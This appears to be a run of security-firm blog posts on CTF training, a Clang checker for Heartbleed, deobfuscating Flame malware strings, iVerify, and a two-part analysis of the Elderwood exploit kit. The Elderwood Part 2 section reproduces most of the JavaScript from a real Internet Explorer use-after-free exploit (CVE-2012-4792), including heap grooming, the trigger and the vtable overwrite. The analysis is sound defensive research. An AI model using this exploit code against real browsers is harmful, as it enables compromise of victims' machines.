We’ve Moved!

Trail of Bits headquarters has moved! Located in the heart of the financial district, our new office features a unique design, cool modern decor, and an open layout that makes us feel right at home.

With fast internet, well-appointed conference rooms, and comfortable work stations, we feel that this is a great place to grow our business.

We are also loving our new commute options. We have easy access to several main subway lines, and for those of us who bike, there is indoor bicycle storage and a Citibike located right outside our building. Oh yeah, there’s also this view:

We’re hiring and we encourage you to apply if you’re interested in joining us!

Dear DARPA: Challenge Accepted.

CGC_Stacked_ColoronBlack

We are proud to have one of the only seven accepted funded-track proposals to DARPA’s Cyber Grand Challenge.

Computer security experts from academia, industry and the larger security community have organized themselves into more than 30 teams to compete in DARPA’s Cyber Grand Challenge —- a first-of-its-kind tournament designed to speed the development of automated security systems able to defend against cyberattacks as fast as they are launched. DARPA also announced today that it has reached an agreement to hold the 2016 Cyber Grand Challenge final competition in conjunction with DEF CON, one of the largest computer security conferences in the world.

More info from DARPA:

Press coverage:

Our participation in this program aligns with our development of Javelin, an automated system for simulating attacks against enterprise networks. We have assembled a world-class team of experts in software security, capture the flag, and program analysis to compete in this challenge. As much as we wish the other teams luck in this competition, Trail of Bits is playing to win. Game on!

Trail of Bits Releases Capture the Flag Field Guide

Free Online Coursework Allows Students, Professionals to Build Essential Offensive Security Skills

New York, NY (May 20, 2014)–Security researchers at Trail of Bits today introduced the CTF Field Guide (Capture the Flag), a freely available, self-guided online course designed to help university and high school students hone the skills needed to succeed in the fast-paced, offensive competitions known as Capture the Flag.

Capture the Flag events consist of many small challenges that require participants to exercise skills across the spectrum of computer security, from exploit creation and vulnerability discovery to forensics. Participation in such games is widely viewed as a critical step in building computer security expertise, especially for high school and college students considering a career in the field.

Despite the value of CTF events, few high schools and colleges have the resources to mentor students interested in computer security, and often the expertise needed to create and train CTF teams is lacking. The CTF Field Guide will help students build the skills to compete and succeed in these competitions, supplementing their existing coursework in computer security and providing motivated students with the structure and guidance to form their own CTF teams.

The CTF Field Guide is based on course content created by Dan Guido, co-founder and CEO of Trail of Bits and Hacker in Residence at NYU Polytechnic School of Engineering, one of the first universities to offer a cybersecurity program.

Guido is among the few instructors in the country to teach offensive security tactics, and his Penetration Testing and Vulnerability Analysis course is a mainstay of the cybersecurity programs at NYU Engineering. The CTF Field Guide combines elements of Guido’s classes, along with material Trail of Bits developed in collaboration with the Defense Advanced Research Projects Agency (DARPA) to train military academy students and reference material from leading security researchers around the world.

“Capture the Flag events can test and improve almost every skill that computer security professionals rely on, but one of the most valuable is mastering offensive maneuvers—-learning to think like attackers,” said Guido. “We created the CTF Field Guide to allow anyone interested in boosting their skills, from high school students to working professionals, to benefit from some of the best teaching in the world, free of charge and at their own pace.”

The CTF Field Guide is housed on GitHub, which allows users to contribute to and improve the course material over time. It is also available as a downloadable GitBook that can be viewed as a pdf or ebook. While courses on similar topics have been previously offered online, the CTF Field Guide is the first to be freely available and to allow ongoing collaboration and updates based on real-world attack trends.

Participation in CTF competitions has skyrocketed in recent years. Some of the largest events—DEF CON’s CTF and the NYU Engineering CSAW CTF among them—attract tens of thousands of entrants, and many events now include challenges specifically tailored for young student teams.

Trail of Bits is a sponsor of the High School CTF (HSCTF), the first CTF event designed for high school students by their peers which included more than 1000 competitors. Guido believes there’s no better time to launch the CTF Field Guide. “Students who competed in these recent games—or who plan to do so in the future—can start the course right now and there’s no question they’ll be better prepared to succeed next year.”

About Trail of Bits

Founded in 2012, Trail of Bits enables enterprises to make better strategic security decisions with its world-class experience in security research, red teaming and incident response. The Trail of Bits management team is comprised of some of the most recognized researchers in the security industry, renowned for their expertise in reverse engineering, novel exploit techniques and mobile security. Trail of Bits has collaborated extensively with DARPA on the agency’s acclaimed Cyber Fast Track, Cyber Grand Challenge and Cyber Stakes programs. In 2014, the company launched its first enterprise product, Javelin, which simulates attacks to help companies measure and refine their security posture.

Learn more at www.trailofbits.com

Using Static Analysis and Clang To Find Heartbleed

Background

Friday night I sat down with a glass of Macallan 15 and decided to write a static checker that would find the Heartbleed bug. I decided that I would write it as an out-of-tree clang analyzer plugin and evaluate it on a few very small functions that had the spirit of the Heartbleed bug in them, and then finally on the vulnerable OpenSSL code-base itself.

The Clang project ships an analysis infrastructure with their compiler, it’s invoked via scan-build. It hooks whatever existing make system you have to interpose the clang analyzer into the build process and the analyzer is invoked with the same arguments as the compiler. This way, the analyzer can ‘visit’ every compilation unit in the program that compiles under clang. There are some limitations to clang analyzer that I’ll touch on in the discussion section.

This exercise added to my list of things that I can only do while drinking: I have the best success with first-order logic while drinking beer, and I have the best success with clang analyzer while drinking scotch.

Strategy

One approach to identify Heartbleed statically was proposed by Coverity recently, which is to taint the return values of calls to ntohl and ntohs as input data. One problem with doing static analysis on a big state machine like OpenSSL is that your analysis either has to know the state machine to be able to track what values are attacker influenced across the whole program, or, they have to have some kind of annotation in the program that tells the analysis where there is a use of input data.

I like this observation because it is pretty actionable. You mark ntohl calls as producing tainted data, which is a heuristic, but a pretty good one because programmers probably won’t htonl their own data.

What our clang analyzer plugin should do is identify locations in the program where variables are written using ntohl, taint them, and then alert when those tainted values are used as the size parameter to memcpy. Except, that isn’t quite right, it could be the use is safe. We’ll also check the constraints of the tainted values at the location of the call: if the tainted value hasn’t been constrained in some way by the program logic, and it’s used as an argument to memcpy, alert on a bug. This could also miss some bugs, but I’m writing this over a 24h period with some Scotch, so increasing precision can come later.

Clang analyzer details

The clang analyzer implements a type of symbolic execution to analyze C/C++ programs. Plugging in to this framework as an analyzer requires bending your mind around the clang analyzer view of program state. This is where I consumed the most scotch.

The analyzer, under the hood, performs a symbolic/abstract exploration of program state. This exploration is flow and path sensitive, so it is different from traditional compiler data flow analysis. The analysis maintains a “state” object for each path through the program, and in this state object are constraints and facts about the program’s execution on that path. This state object can be queried by your analyzer, and, your analyzer can change the state to include information produced by your analysis.

This was one of my biggest hurdles when writing the analyzer – once I have a “symbolic variable” in a particular state, how do I query the range of that symbolic variable? Say there is a program fragment that looks like this:

int data = ntohl(pkt_data);
if(data >= 0 && data < sizeof(global_arr)) {
 // CASE A
...
} else {
 // CASE B
 ...
}

When looking at this program from the analyzers point of view, the state “splits” at the if into two different states A and B. In state A, there is a constraint that data is between certain bounds, and in case B there is a constraint that data is NOT within certain bounds. How do you access this information from your checker?

If your checker calls the “dump” method on its given “state” object, data like the following will be printed out:

Ranges of symbol values:
 conj_$2{int} : { [-2147483648, -2], [0, 2147483647] }
 conj_$9{uint32_t} : { [0, 6] }

In this example, conj_$9{uint32_t} is our ‘data’ value above and the state is in the A state. We have a range on ‘data’ that places it between 0 and 6. How can we, as the checker, observe that there’s a difference between this range and an unconstrained range of say [-2147483648, 2147483648]?

The answer is, we create a formula that tests the symbolic value of ‘data’ against some conditions that we enforce, and then we ask the state what program states exist when this formula is true and when it is false. If a new formula contradicts an existing formula, the state is infeasible and no state is generated. So we create a formula that says, roughly, “data > 500″ to ask if data could ever be greater than 500. When we ask the state for new states where this is true and where it is false, it will only give us a state where it is false.

This is the kind of idiom used inside of clang analyzer to answer questions about constraints on state. The arrays bounds checkers use this trick to identify states where the sizes of an array are not used as constraints on indexes into the array.

Implementation

Your analyzer is implemented as a C++ class. You define different “check” functions that you want to be notified of when the analyzer is exploring program state. For example, if your analyzer wants to consider the arguments to a function call before the function is called, you create a member method with a signature that looks like this:

void checkPreCall(const CallEvent &Call, CheckerContext &C) const;

Your analyzer can then match on the function about to be (symbolically) invoked. So our implementation works in three stages:

  1. Identify calls to ntohl/ntoh
  2. Taint the return value of those calls
  3. Identify unconstrained uses of tainted data

We accomplish the first and second with a checkPostCall visitor that roughly does this:

void NetworkTaintChecker::checkPostCall(const CallEvent &Call,
CheckerContext &C) const {
  const IdentifierInfo *ID = Call.getCalleeIdentifier();

  if(ID == NULL) {
    return;
  }

  if(ID->getName() == "ntohl" || ID->getName() == "ntohs") {
    ProgramStateRef State = C.getState();
    SymbolRef 	    Sym = Call.getReturnValue().getAsSymbol();

    if(Sym) {
      ProgramStateRef newState = State->addTaint(Sym);
      C.addTransition(newState);
    }
  }

Pretty straightforward, we just get the return value, if present, taint it, and add the state with the tainted return value as an output of our visit via ‘addTransition’.

For the third goal, we have a checkPreCall visitor that considers a function call parameters like so:

void NetworkTaintChecker::checkPreCall(const CallEvent &Call,
CheckerContext &C) const {
  ProgramStateRef State = C.getState();
  const IdentifierInfo *ID = Call.getCalleeIdentifier();

  if(ID == NULL) {
    return;
  }
  if(ID->getName() == "memcpy") {
    SVal            SizeArg = Call.getArgSVal(2);
    ProgramStateRef state =C.getState();

    if(state->isTainted(SizeArg)) {
      SValBuilder       &svalBuilder = C.getSValBuilder();
      Optional<NonLoc>  SizeArgNL = SizeArg.getAs<NonLoc>();

      if(this->isArgUnConstrained(SizeArgNL, svalBuilder, state) == true) {
        ExplodedNode  *loc = C.generateSink();
        if(loc) {
          BugReport *bug = new BugReport(*this->BT, "Tainted,
unconstrained value used in memcpy size", loc);
          C.emitReport(bug);
        }
      }
    }
  }

Also relatively straightforward, our logic to check if a value is unconstrained is hidden in ‘isArgUnConstrained’, so if a tainted, symbolic value has insufficient constraints on it in our current path, we report a bug.

Some implementation pitfalls

It turns out that OpenSSL doesn’t use ntohs/ntohl, they have n2s / n2l macros that re-implement the byte-swapping logic. If this was in LLVM IR, it would be tractable to write a “byte-swapping recognizer” that uses an amount of logic to prove when a piece of code approximates the semantics of a byte-swap.

There is also some behavior that I have not figured out in clang’s creation of the AST for openssl where calls to ntohs are replaced with __builtin_pre(__x), which has no IdentifierInfo and thus no name. To work around this, I replaced the n2s macro with a function call to xyzzy, resulting in linking failures, and adapted my function check from above to check for a function named xyzzy. This worked well enough to identify the Heartbleed bug.

Solution output with demo programs and OpenSSL

First let’s look at some little toy programs. Here is one toy example with output:

$ cat demo2.c

...

int data_array[] = { 0, 18, 21, 95, 43, 32, 51};

int main(int argc, char *argv[]) {
  int   fd;
  char  buf[512] = {0};

  fd = open("dtin", O_RDONLY);

  if(fd != -1) {
    int size;
    int res;

    res = read(fd, &size, sizeof(int));

    if(res == sizeof(int)) {
      size = ntohl(size);

      if(size < sizeof(data_array)) {
        memcpy(buf, data_array, size);
      }

      memcpy(buf, data_array, size);
    }

    close(fd);
  }

  return 0;
}

$ ../docheck.sh
scan-build: Using '/usr/bin/clang' for static analysis
/usr/bin/ccc-analyzer -o demo2 demo2.c
demo2.c:30:7: warning: Tainted, unconstrained value used in memcpy size
      memcpy(buf, data_array, size);
      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1 warning generated.
scan-build: 1 bugs found.
scan-build: Run 'scan-view /tmp/scan-build-2014-04-26-223755-8651-1' to
examine bug reports.

And finally, to see it catching Heartbleed in both locations it was present in OpenSSL, see the following:

Image

Image

Discussion

The approach needs some improvement, we reason about if a tainted value is “appropriately” constrained or not in a very coarse-grained way. Sometimes that’s the best you can do though – if your analysis doesn’t know how large a particular buffer is, perhaps it’s enough to show to an analyst “hey, this value could be larger than 5000 and it is used as a parameter to memcpy, is that okay?”

I really don’t like the limitation in clang analyzer of operating on ASTs. I spent a lot of time fighting with the clang AST representation of ntohs and I still don’t understand what the source of the problem was. I kind of just want to consider a programs semantics in a virtual machine with very simple semantics, so LLVM IR seems ideal to me. This might just be my PL roots showing though.

I really do like the clang analyzers interface to path constraints. I think that interface is pretty powerful and once you get your head around how to apply your problem to asking states if new states satisfying your constraints are feasible, it’s pretty straightforward to write new analyses.

Edit: Code Post

I’ve posted the code for the checker to Github, here.

Introducing Javelin

Javelin

Javelin shows you how modern attackers would approach and exploit your enterprise. By simulating real-time, real-world attack techniques, Javelin identifies which employees are most likely to be targets of spearphishing campaigns, uncovers security infrastructure weaknesses, and compares overall vulnerability against industry competitors. Javelin benchmarks the efficacy of defensive strategies, and provides customized recommendations for improving security and accelerating threat detection. Highly automated, low touch, and designed for easy adoption, Javelin will harden your existing security and information technology infrastructure.

Read more about Javelin on the Javelin Blog.

Semantic Analysis of Native Programs, introducing CodeReason

Introduction

Have you ever wanted to make a query into a native mode program asking about program locations that write a specific value to a register? Have you ever wanted to automatically deobfuscate obfuscated strings?

Reverse engineering a native program involves understanding its semantics at a low level until a high level picture of functionality emerges. One challenge facing a principled understanding of a native mode program is that this understanding must extend to every instruction used by the program. Your analysis must know which instructions have what effects on memory calls and registers.

We’d like to introduce CodeReason, a machine code analysis framework we produced for DARPA Cyber Fast Track. CodeReason provides a framework for analyzing the semantics of native x86 and ARM code. We like CodeReason because it provides us a platform to make queries about the effects that native code has on overall program state. CodeReason does this by having a deep semantic understanding of native instructions.

Building this semantic understanding is time-consuming and expensive. There are existing systems, but they have high barriers to entry or don’t do precisely what we want, or they don’t apply simplifications and optimizations to their semantics. We want to do that because these simplifications can reduce otherwise hairy optimizations to simple expressions that are easy to understand. To motivate this, we’ll give an example of a time we used CodeReason.

Simplifying Flame

Around when the Flame malware was revealed, some of its binaries were posted onto malware.lu. Their overall scheme is to store the obfuscated string in a structure in global data. The structure looks something like this:


struct ObfuscatedString {
char padding[7];
char hasDeobfuscated;
short stringLen;
char string[];
};

Each structure has variable-length data at the end, with 7 bytes of data that were apparently unused.

There are two fun things here. First I used Code Reason to write a string deobfuscator in C. The original program logic performs string deobfuscation in three steps.

The first function checks the hasDeobfuscated field and if it is zero, will return a pointer to the first element of the string. If the field is not zero, it will call the second function, and then set hasDeobfuscated to zero.

The second function will iterate over every character in the ‘string’ array. At each character, it will call a third function and then subtract the value returned by the third function from the character in the string array, writing the result back into the array. So it looks something like:


void inplace_buffer_decrypt(unsigned char *buf, int len) {
int counted = 0;
while( counted < len ) {
unsigned char *cur = buf + counted;
unsigned char newChar = get_decrypt_modifier_f(counted);
*cur -= newChar;
++counted;
}
return;
}

What about the third function, ‘get_decrypt_modifier’? This function is one basic block long and looks like this:


lea ecx, [eax+11h]
add eax, 0Bh
imul ecx, eax
mov edx, ecx
shr edx, 8
mov eax, edx
xor eax, ecx
shr eax, 10h
xor eax, edx
xor eax, ecx
retn

An advantage of having a native code semantics understanding system is that I could capture this block and feed it to CodeReason and have it tell me what the equation of ‘eax’ looks like. This would tell me what this block ‘returns’ to its caller, and would let me capture the semantics of what get_decrypt_modifier does in my deobfuscator.

It would also be possible to decompile this snippet to C, however what I’m really concerned with is the effect of the code on ‘eax’ and not something as high-level as what the code “looks like” in a C decompilers view of the world. C decompilers also use a semantics translator, but then proxy the results of that translation through an attempt at translating to C. CodeReason lets us skip the last step and consider just the semantics, which sometimes can be more powerful.

Using CodeReason

Getting this from CodeReason looks like this:


$ ./bin/VEEShell -a X86 -f ../tests/testSkyWipe.bin
blockLen: 28
r
...
EAX = Xor32[ Xor32[ Shr32[ Xor32[ Shr32[ Mul32[ Add32[ REGREAD(EAX), I:U32(0xb) ], Add32[ REGREAD(EAX), I:U32(0x11) ] ], I:U8(0x8) ], Mul32[ Add32[ REGREAD(EAX), I:U32(0xb) ], Add32[ REGREAD(EAX), I:U32(0x11) ] ] ], I:U8(0x10) ], Shr32[ Mul32[ Add32[ REGREAD(EAX), I:U32(0xb) ], Add32[ REGREAD(EAX), I:U32(0x11) ] ], I:U8(0x8) ] ], Mul32[ Add32[ REGREAD(EAX), I:U32(0xb) ], Add32[ REGREAD(EAX), I:U32(0x11) ] ] ]
...
EIP = REGREAD(ESP)

This is cool, because if I implement functions for Xor32, Mul32, Add32, and Shr32, I have this function in C, like so:


unsigned char get_decrypt_modifier_f(unsigned int a) {
return Xor32(
Xor32(
Shr32(
Xor32(
Shr32(
Mul32(
Add32( a, 0xb),
Add32( a, 0x11) ),
0x8 ),
Mul32(
Add32( a, 0xb ),
Add32( a, 0x11 ) ) ),
0x10 ),
Shr32(
Mul32(
Add32( a, 0xb ),
Add32( a, 0x11 ) ),
0x8 ) ),
Mul32(
Add32( a, 0xb ),
Add32( a, 0x11 ) ) );
}

And this also is cool because it works.


C:\code\tmp>skywiper_string_decrypt.exe
CreateToolhelp32Snapshot

We’re extending CodeReason into an IDA plugin that allows us to make these queries directly from IDA, which should be really cool!

The second fun thing here is that this string deobfuscator has a race condition. If two threads try and deobfuscate the same thread at the same time, they will corrupt the string forever. This could be bad if you were trying to do something important with an obfuscated string, as it would result in passing bad data to a system service or something, which could have very bad effects.

I’ve used CodeReason to attack string obfuscations that were implemented like this:


xor eax eax
push eax
sub eax, 0x21ece84
push eax

Where the sequence of native instructions would turn non-string immediate values into string values (through a clever use of the semantics of twos compliment arithmetic) and then push them in the correct order onto the stack, thereby building a string dynamically each time the deobfuscation code ran. CodeReason was able to look at this and, using a very simple pinhole optimizer, convert the code into a sequence of memory writes of string immediate values, like:


MEMWRITE[esp] = '.dll'
MEMWRITE[esp-4] = 'nlan'

Conclusions

Having machine code in a form where it can be optimized and understood can be kind of powerful! Especially when that is available from a programmatic library. Using CodeReason, we were able to extract the semantics of string obfuscation functions and automatically implement a string de-obfuscator. Further, we were able to simplify obfuscating code into a form that expressed the de-obfuscated string values on their own. We plan to cover additional uses and capabilities of CodeReason in future blog posts.

iVerify is now available on Github

Today we’re excited to release an open-source version of iVerify!

iPhone users now have an easy way to ensure their phones are free of malware.

iVerify validates the integrity of supported iOS devices and detects modifications that malware or jailbreaking would make, without the use of signatures. It runs at boot-time and thoroughly inspects the device, identifying any changes and collecting relevant artifacts for offline analysis.

In order to use iVerify, grab the code from GitHub, put your phone in DFU mode and run the iverify utility. Prompts on screen will indicate whether surreptitious modifications have been made. Visit the GitHub repository for more information about iVerify.

Free Ruby Security Workshop

We interrupt our regularly scheduled programming to bring you an important announcement: On Thursday, June 6th, just in time for SummerCon, we will be hosting a free Ruby Security Workshop in NYC! Signups are first-come, first-serve and we only have space for 30 people. Sign up here and we will email the selected participants the location of the training on Tuesday night.

In the last year, many new vulnerabilities and vulnerability classes have been discovered in Ruby applications. These vulnerabilities make use of features specific to the Ruby language and common idioms present in large Ruby projects, such as serialization and deserialization of data in the YAML format. As these vulnerability classes were initially discovered in popular and well-studied open source software, it’s extremely likely that they occur in applications throughout the Ruby ecosystem. These applications frequently represent lucrative targets for attackers, and with the appearance of new and easily exploitable bug classes, the potential for targeted and mass exploitation of Ruby programs has been demonstrated to the world. In this workshop, we aim to bridge a knowledge and skills gap by bringing information about these new vulnerability classes to software developers.

Our Ruby Security Workshop will be led by Hal Brodigan (@postmodern_mod3) and covers recent Ruby on Rails vulnerabilities classes, their root causes, and exercises where students develop exploits for real-world vulnerabilities. Attendees will learn the patterns behind the vulnerabilities and develop software engineering strategies to avoid introducing these flaws into their projects.

If you’re in the city for SummerCon and interested in attending on Thursday, fill out our signup form and selected participants will be sent more info tomorrow. We’re excited to bring you programs like this and we hope to see you there!

Writing Exploits with the Elderwood Kit (Part 2)

In the third part of our five-part series, we investigate the how the toolkit user gained control of program flow and what their strategy means for the reliability of their exploit.

Last time, we talked about how the Elderwood kit does almost everything for the kit user except give them a vulnerability to use. We think it is up to the user to discover a vulnerability, trigger and exploit it, then integrate it with the kit. Our analysis indicates that their knowledge of how to do this is poor and the reliability of the exploit suffered as a result. In the sections that follow, we walk through each section of the exploit that the user had to write on their own.

The Document Object Model (DOM)

The HTML Document Object Model (DOM) is a representation of an HTML page, used for accessing and modifying properties. Browsers provide an interface to the DOM via JavaScript. This interface allows websites to have interactive and dynamically generated content. This interface is very complicated and is subject to many security flaws such as the use-after-free vulnerability used by the attackers in the CFR compromise. For example, the Elderwood group has been responsible for discovering and exploiting at least three prior vulnerabilities of this type in Internet Explorer.

Use-after-Free Vulnerabilities

Use-after-free vulnerabilities occur when a program frees a block and then attempts to use it at some later point in program execution. If, before the block is reused, an attacker is able to allocate new data in its place then they can gain control of program flow.

Exploiting a Use-after-Free

  1. Program allocates and then later frees block A
  2. Attacker allocates block B, reusing the memory previously allocated to block A
  3. Attacker writes data into block B
  4. Program uses freed block A, accessing the data the attacker left there

In order to take advantage of CVE-2012-4792, the exploit allocated and freed a CButton object. While a weak reference to the freed object was maintained elsewhere in Internet Explorer, the exploit overwrote the CButton object with their own data. The exploit then triggered a virtual function call on the CButton object, using the weak reference, resulting in control of program execution.

Prepare the Heap

After 16 allocations of the same size occur, Internet Explorer will switch to using the Low Fragmentation Heap (LFH) for further heap allocations. Since these allocations exist on a different heap, they are not usable for exploitation and have to be ignored. To safely skip over the first 16 allocations, the exploit author creates 3000 string allocations of a similar size to the CButton object by assigning the className property on a div tag.

var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++) {
	arrObject[i] = document.createElement('div');
	arrObject[i].className = unescape("ababababababababababababababababababababa");
}

The contents of the chosen string, repeated “ab”s,  is not important. What is important is the size of the allocation created by it. The LFH has an 8 byte granularity for allocations less than 256 bytes so allocations between 80 and 88 bytes will be allocated from the same area. Here is an example memory dump of what the string in memory would look like:

00227af8  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b08  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b18  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b28  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b38  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b48  61 00 00 00 00 00 00 00-0a 7e a8 ea 00 01 08 ff  a........~......

Then, the exploit author assigns the className of every other div tag to null, thereby freeing the previously created strings when CollectGarbage() is called. This will create holes in the allocated heap memory and creates a predictable pattern of allocations.

for (var i = 0; i < arrObject.length; i += 2) {
	arrObject[i].className = null;
}
CollectGarbage();

Next, the author creates 500 button elements. As before, they free every other one to create holes and call CollectGarbage() to enable reuse of the allocations.

for (var i = 0; i < elmObject.length; i++) {
	elmObject[i] = document.createElement('button');
}
for (var i = 1; i < arrObject.length; i += 2) {
	arrObject[i].className = null;
}
CollectGarbage();

In one of many examples of reused code in the exploit, the JavaScript array used for heap manipulation is called arrObject. This happens to be the variable name given to an example of how to create arrays found on page 70 of the JavaScript Cookbook.

Trigger the Vulnerability

The code below is responsible for creating the use-after-free condition. The applyElement and appendChild calls create the right conditions and new allocations. The free will occur after setting the outerText property on the q tag and then calling CollectGarbage().

try {
	e0 = document.getElementById("a");
	e1 = document.getElementById("b");
	e2 = document.createElement("q");
	e1.applyElement(e2);
	e1.appendChild(document.createElement('button'));
	e1.applyElement(e0);
	e2.outerText = "";
	e2.appendChild(document.createElement('body'));
} catch (e) {}
CollectGarbage();

At this point, there is now a pointer to memory that has been freed (a stale pointer). In order to continue with the exploit, the memory it points to must be replaced with attacker-controlled data and then the pointer must be used.

Notably, the vulnerability trigger is the only part of the exploit that is wrapped in a try/catch block. In testing, we confirmed that this try/catch is not a necessary condition for triggering the vulnerability or for successful exploitation. If the author were concerned about unhandled exceptions, they could have wrapped all their code in a try/catch instead of only this part. This condition suggests that the vulnerability trigger is separate from any code the developed wrote on their own and may have been automatically generated.

Further, the vulnerability trigger is the one part of the exploit code that a fuzzer can generate on its own. Such a security testing tool might have wrapped many DOM manipulations in try/catch blocks on every page load to maximize the testing possible without relaunching the browser. Given the number of other unnecessary operations left in the code, it is likely that the output of a fuzzer was pasted into the exploit code and the try/catch it used was left intact.

Replace the Object

To replace the freed CButton object with memory under their control, the attacker consumes 20 allocations from the LFH and then targets the 21st allocation for the replacement. The choice to target the 21st allocation was likely made through observation or experimentation, rather than precise knowledge of heap memory. As we will discuss in the following section, this assumption leads to unreliable behavior from the exploit. If the author had a better understanding of heap operations and changed these few lines of code, the exploit could have been much more effective.

for (var i = 0; i < 20; i++) {
	arrObject[i].className = unescape("ababababababababababababababababababababa");
}
window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");

The window.location line has two purposes: it creates a replacement object and triggers the use of the stale pointer. As with most every other heap allocation created for this exploit, the unescape() function is called to create a string. This time it is slightly different. The exploit author uses %u encoding to fully control the first DWORD in the allocation, the vtable of an object.

For the replaced object, the memory will look like this:

19eb1c00  10ab0d0c 00740068 00700074 003a0073  ….h.t.t.p.s.:.
19eb1c10  002f002f 00770077 002e0077 006f0067  /./.w.w.w...g.o.
19eb1c20  0067006f 0065006c 0063002e 006d006f  o.g.l.e...c.o.m.
19eb1c30  0073002f 00740065 00690074 0067006e  /.s.e.t.t.i.n.g.
19eb1c40  002f0073 00630061 006f0063 006e0075  s./.a.c.c.o.u.n.
19eb1c50  00000074 00000061 f0608e93 ff0c0000  t...a.....`.....

When window.location is set, the browser goes to the URL provided in the string. This change of location will free all the allocations created by the current page since they are no longer necessary. This triggers the use of the freed object and this is when the attacker gains control of the browser process. In this case, this causes the browser to load “/[unprintablebytes]https://www.google.com/settings/account” on the current domain. Since this URL does not exist, the iframe loading the exploit on the CFR website will show an error page.

In summary, the exploit overwrites a freed CButton object with data that the attacker controls. In this case, a very fragile technique to overwrite the freed CButton object was used and the exploits fails to reliably gain control of execution on exploited browsers as result. Instead of overwriting a large amount of objects that may have been recently freed, the exploit writers assume that the 21st object they overwrite will always be the correct freed CButton object. This decreases the reliability of the exploit because it assumes a predetermined location of the freed CButton object in the freelist.

Now that the vulnerability can be exploited, it can be integrated with the kit by using the provided address we mentioned in the previous post, 0x10ab0d0c. By transferring control to the SWF loaded at that address, the provided ROP chains and staged payload will be run by the victim.

Reliability

Contrary to popular belief, it is possible for an exploit to fail even on a platform that it “supports.” Exploits for use-after-frees rely on complex manipulation of the heap to perform controlled memory allocations. Assumptions about the state of memory may be broken by total available memory, previously visited websites, the number of CPUs present, or even changes to software running on the host. Therefore, we consider exploit reliability to be a measure of successful payload execution vs total attempts in these various scenarios.

We simulated real-world use of the Elderwood exploit for CVE-2012-4792 to determine its overall reliability. We built a Windows XP test system with versions of Internet Explorer, Flash and Java required by the exploit. Our testing routine started by going to a random website, selected from several popular websites, and then going to our testing website hosting the exploit. We think this is a close approximation of real-world use since the compromised website is not likely to be anyone’s homepage.

Under these ideal conditions, we determined the reliability of the exploit to be 60% in our testing. Although it is unnecessary to create holes to trigger the vulnerability to exploit it successfully, as described in the previous code snippets, we found that reliability drops to about 50% if these operations are not performed. We describe some of the reasons for such a low reliability below:

  • The reliance on the constant memory address provided by the SWF. If memory allocations occur elsewhere and at this address where the exploit assumes they will be, the browser will crash. For example, if a non-ASLR’d plugin is loaded at 0x10ab0d0c, the exploit will never succeed. This can also occur on Windows XP if a large module is loaded at the default load address of 0×10000000.
  • The assumption that the 21st object will be reused by the stale CButton pointer. If the stale CButton pointer reuses any other address, then this assumption will cause the exploit to fail. In this case, the exploit will dereference 0×00410042 from the allocations of the “ab” strings.
  • The use of the garbage collector to trigger the vulnerability. Using the garbage collector is a good way to trigger this vulnerability, however, it can have uncertain side effects. For example, if the heap coalesces, it is likely that the stale pointer will point to a buffer not under the attacker’s control and cause the browser to crash.

Even before testing this exploit, it was clear that it could only target a subset of affected browsers due to its reliance on Flash and other plugins for bypassing DEP and ASLR. We built an ideal test environment with these constraints and found their replacement technique to be a significant source of unreliable behavior. Nearly 50% of website visitors that should have been exploited were not due to the fragility of the replacement technique.

Conclusions

After being provided easy-to-use interfaces to DEP and ASLR bypasses, the user of this kit must only craft an object replacement strategy to create a working exploit. Our evaluation of the object replacement code in this exploit indicates the author’s grasp of this concept was poor and the exploit is unreliable as a result. Reliability of this exploit would have been much higher if the author had a better understanding of heap operations or had followed published methodologies for object replacements. Instead, the author relied upon assumptions about the state of memory and parts of their work appear copied from cookbook example code.

Up until this point, the case could be made that the many examples of copied example code were the result of a false flag. Our analysis indicates that, in the part of the exploit that mattered most, the level of skill displayed by the user remained consistent with the rest of the exploit. If the attacker were feigning incompetence, it is unlikely that this critical section of code would be impaired in more than a superficial way. Instead, this attack campaign lost nearly half of the few website visitors that it could have exploited. Many in the security industry believe that APT groups “weaponize” exploits before using them in the wild. However, continued use of the Elderwood kit for strategic website compromises indicates that neither solid engineering practices nor highly reliable exploit code is required for this attacker group to achieve their goals.

Writing Exploits with the Elderwood Kit (Part 1)

In the second part of our five-part series, we investigate the tools provided by the Elderwood kit for developing exploits from discovered vulnerabilities.

Several mitigations must be avoided or bypassed in order to exploit browser vulnerabilities, even on platforms as old as Windows XP. Elderwood provides tools to overcome these obstacles with little to no knowledge required of their underlying implementation. Historical use of the Elderwood kit for browser exploits has been focused on use-after-free vulnerabilities in Internet Explorer. Exploitation of use-after-free vulnerabilities is well documented and systematic and a quick search reveals several detailed walkthroughs. Exploits of this type have three primary obstacles to overcome:

  • Heap spray technique
  • DEP bypass
  • ASLR bypass

Each component of the kit abstracts a method for overcoming these obstacles in straightforward way. We examine how these components work, their reliability, technical sophistication, and describe how these components are exposed to the kit user. Supported targets and reliability of exploit code are directly tied to the design and implementation decisions of these components.

Heap Spray and DEP Bypass (today.swf)

Data Execution Prevention (DEP) prevents memory from being implicitly executable. Exploits commonly create a payload in memory as data and then try to execute it. When DEP is enabled, the attacker must have their payload explicitly marked executable. In order to bypass this protection, an exploit can take advantage of code that is already in memory and is marked executable. Many exploits chain together calls to functions to mark their payload executable in a practice sometimes referred to as return-oriented programming (ROP). Internet Explorer 8 on Windows XP and later takes advantage of DEP and this mitigation must be bypassed to successfully execute code.

Today.swf performs the DEP bypass for the user. This Flash document sets up many ROP chains in memory so that one will be at a known location (heap spraying). When Internet Explorer is exploited, the ROP chain performs pivots the stack to one of the fake stacks instead of the legitimate one. After the stack pivot, the ROP chain executes a sequence of instructions to make an executable copy of the deobfuscation code that turns xsainfo.jpg into a DLL, and executes it. This can be done from within Flash, a plugin, because it shares the same memory space as the browser rendering process, unlike Chrome and Safari and Firefox.

